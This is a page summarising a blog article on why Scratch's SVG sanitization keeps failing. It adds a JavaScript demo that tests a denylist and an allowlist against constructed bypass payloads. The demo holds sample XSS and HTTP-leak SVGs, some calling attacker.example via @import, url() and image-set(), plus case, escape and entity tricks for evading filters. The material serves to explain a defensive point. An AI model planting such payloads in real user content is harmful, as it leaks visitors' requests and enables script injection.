The Woes of Sanitizing SVGs
Scratch has faced recurring security issues from its handling of user-generated SVGs, repeatedly patching vulnerabilities such as XSS and HTTP leaks only to encounter new ones, because the root cause is not any single bug but the practice of appending attacker-controlled SVG markup to the main document. Despite layers of sanitization built from tools like DOMPurify and custom CSS parsers, attackers have consistently found bypasses through SVG and CSS features such as script tags, CSS @import, url(), image-set(), and other newer CSS capabilities. The article argues that Scratch's approach to SVG sanitization is fundamentally flawed and unsustainable, because a denylist-style sanitizer cannot keep pace with the complexity and evolution of web standards. As of 2026, several of the reported vulnerabilities remain unfixed or only partially mitigated.
- Scratch appends user-generated SVGs to the main document for operations such as bounding-box measurement (more reliable than reading viewBox or width/height); however briefly the SVG is attached, attacker-controlled markup in the page's own DOM is an inherently unsafe operation.
- XSS and HTTP-leak vulnerabilities have been found repeatedly since 2019, via script tags, CSS @import, url(), image-set(), and long CSS transitions.
- Sanitization methods such as regex filtering and DOMPurify have proven insufficient: bypasses have used case variation, escape sequences, and SVG/CSS features the sanitizer did not anticipate.
- As of 2026, vulnerabilities allowing full-page restyling and HTTP leaks via image-set() remain unfixed despite having been reported.
- The author contends that Scratch's incremental, patch-each-bypass sanitization approach is doomed because it cannot keep pace with the complexity and evolution of the SVG and CSS specifications.
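As an added illustration of the bypass classes listed above (this is example code written for this page, not code from the muffin.ink article or from Scratch), the script below contrasts a denylist regex applied to raw SVG text with a check that first normalizes the CSS the way a browser's parsers would (numeric character references, CSS escapes, case) and then allowlists functional notations. The payloads, the placeholder host `attacker.example` and the `SAFE_FUNCTIONS` set are constructed for the demo; named character references are left out as a scope assumption.

```javascript
// Added example, not code from the muffin.ink article or from Scratch. It shows why a
// denylist regex over raw SVG text is bypassable (case variation, CSS escapes, numeric
// character references), what normalizing before matching fixes, and what it still misses.
// Every payload is constructed for this demo; attacker.example is a placeholder host.

// 1. Naive denylist: rejects markup that contains a few dangerous substrings as typed.
const NAIVE_PATTERNS = [/<script/, /@import/, /url\(/];

function naiveAccepts(svg) {
  return !NAIVE_PATTERNS.some((re) => re.test(svg));
}

// 2. Normalization the CSS engine performs before it ever sees "url(":
//    - CSS escapes: \HHHHHH plus one optional whitespace, or \<any non-newline char>.
function decodeCssEscapes(css) {
  return css.replace(
    /\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\([^\r\n\f])/g,
    (_, hex, ch) => (hex !== undefined ? String.fromCodePoint(parseInt(hex, 16)) : ch),
  );
}

//    - Numeric character references (&#x75; / &#117;), decoded by the markup parser.
//      Named references (&amp; ...) are omitted here (assumption: demo scope only);
//      a real checker must handle them as well.
function decodeNumericEntities(s) {
  return s.replace(/&#x([0-9a-fA-F]+);|&#([0-9]+);/g, (_, hex, dec) =>
    String.fromCodePoint(parseInt(hex !== undefined ? hex : dec, hex !== undefined ? 16 : 10)),
  );
}

// Pull every <style> body and every style="" attribute (case-insensitively), then decode
// references and escapes and lowercase. Decoding references inside <style> bodies can only
// make the check stricter, never looser.
function normalizedCss(svg) {
  const chunks = [];
  for (const m of svg.matchAll(/<style\b[^>]*>([\s\S]*?)<\/style\s*>/gi)) chunks.push(m[1]);
  for (const m of svg.matchAll(/\bstyle\s*=\s*(?:"([^"]*)"|'([^']*)')/gi)) chunks.push(m[1] ?? m[2]);
  return chunks.map((c) => decodeCssEscapes(decodeNumericEntities(c)).toLowerCase());
}

// 3. Allowlist over normalized CSS: no at-rules at all, and only functional notations that
//    cannot trigger a fetch. Anything unknown (url, image-set, src, ...) is rejected.
const SAFE_FUNCTIONS = new Set(['rgb', 'rgba', 'hsl', 'hsla', 'matrix', 'translate', 'rotate', 'scale']);

function allowlistAccepts(svg) {
  if (/<script\b/i.test(svg)) return false;
  for (const css of normalizedCss(svg)) {
    if (/@[a-z-]+/.test(css)) return false;          // @import, @font-face, ...
    for (const m of css.matchAll(/([a-z-]+)\(/g)) {
      if (!SAFE_FUNCTIONS.has(m[1])) return false;   // url(, image-set(, ...
    }
  }
  return true;
}

// Constructed payloads, one per bypass class named in the summary above.
const SAMPLES = {
  benign:     '<svg><style>rect{fill:rgb(1,2,3)}</style><rect/></svg>',
  caseScript: '<svg><SCRIPT>alert(1)</SCRIPT></svg>',
  escImport:  '<svg><style>@\\69mport "https://attacker.example/leak.css";</style></svg>',
  escUrl:     '<svg><style>rect{fill:\\75rl(https://attacker.example/p.png)}</style><rect/></svg>',
  entityUrl:  '<svg><rect style="fill:&#x75;rl(https://attacker.example/p.png)"/></svg>',
  imageSet:   '<svg><style>rect{fill:image-set("https://attacker.example/p.png" 1x)}</style><rect/></svg>',
  // No function, no at-rule: a property-level feature the allowlist above knows nothing about.
  transition: '<svg><style>rect{transition:fill 100000s}</style><rect/></svg>',
};

// Verdict table: true means the checker would let the SVG through.
function verdicts() {
  const out = {};
  for (const [name, svg] of Object.entries(SAMPLES)) {
    out[name] = { naive: naiveAccepts(svg), allowlist: allowlistAccepts(svg) };
  }
  return out;
}

console.table(verdicts());
```

Run it with node and read the table: the naive denylist lets every payload through except none of them, while the normalized allowlist rejects the case, escape, entity, `url()` and `image-set()` cases. The last row is the instructive one: a long `transition` contains no at-rule and no function, so a function allowlist passes it, which is exactly the page's point that each new CSS capability has to be known to the sanitizer before it can be blocked. This example also only inspects text; a sanitizer that runs on the parsed tree (as DOMPurify does) avoids some of the text-level tricks, and the page reports that bypasses were still found against that layer.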
Opening excerpt
The woes of sanitizing SVGs, 2026-04-11, on muffin.ink. Scratch has a long history of SVG-related vulnerabilities. The source of these is that Scratch parses user-generated (i.e. attacker-controlled) content into an <svg> element and appends it into the main document for various operations (e.g. measuring SVG bounding box in a more reliable way than viewBox or width/height). No matter how briefly the SVG remains in the main document, this is an inherently unsafe operation. Scratch's approach to making this safe has been to build increasingly complex infrastructure around parsing the SVG and the markup within to remove dangerous parts. I think Scratch's approach to SVG sanitization is doomed.
…
The full article is at muffin.ink.